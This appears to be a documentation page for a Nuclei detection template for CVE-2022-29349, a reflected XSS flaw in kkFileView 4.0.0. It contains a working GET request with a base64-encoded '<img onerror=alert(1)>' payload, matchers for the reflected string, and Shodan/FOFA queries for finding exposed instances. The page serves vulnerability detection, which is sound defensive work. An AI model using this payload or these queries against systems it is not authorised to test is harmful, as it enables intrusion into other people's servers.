kkFileView 4.0.0 - Cross-Site Scripting
ID: CVE-2022-29349
Severity: medium
Author: arafatansari
Tags: cve,cve2022,kkFileView,xss,keking
Description
Section titled “Description”kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
YAML Source
Section titled “YAML Source”id: CVE-2022-29349
info: name: kkFileView 4.0.0 - Cross-Site Scripting author: arafatansari severity: medium description: | kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability. reference: - https://github.com/kekingcn/kkFileView/issues/347 - https://nvd.nist.gov/vuln/detail/CVE-2022-29349 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29349 cwe-id: CWE-79 epss-score: 0.00314 epss-percentile: 0.70155 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview shodan-query: - http.html:"kkFileView" - http.html:"kkfileview" fofa-query: - body="kkfileview" - app="kkfileview" tags: cve,cve2022,kkFileView,xss,keking
http: - method: GET path: - "{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"
matchers-condition: and matchers: - type: word words: - 'txt"><img src=111 onerror=alert(1)>123'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100d9b79187c4a90f0e0d80e2feaea67014a5e5aac602a9e6af40ed55172fc279ba022100d2aca9cf09f8fb3d90c4871e24a001b3d7d58754bb55ec5638cb81b99b8306d2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-29349.yaml"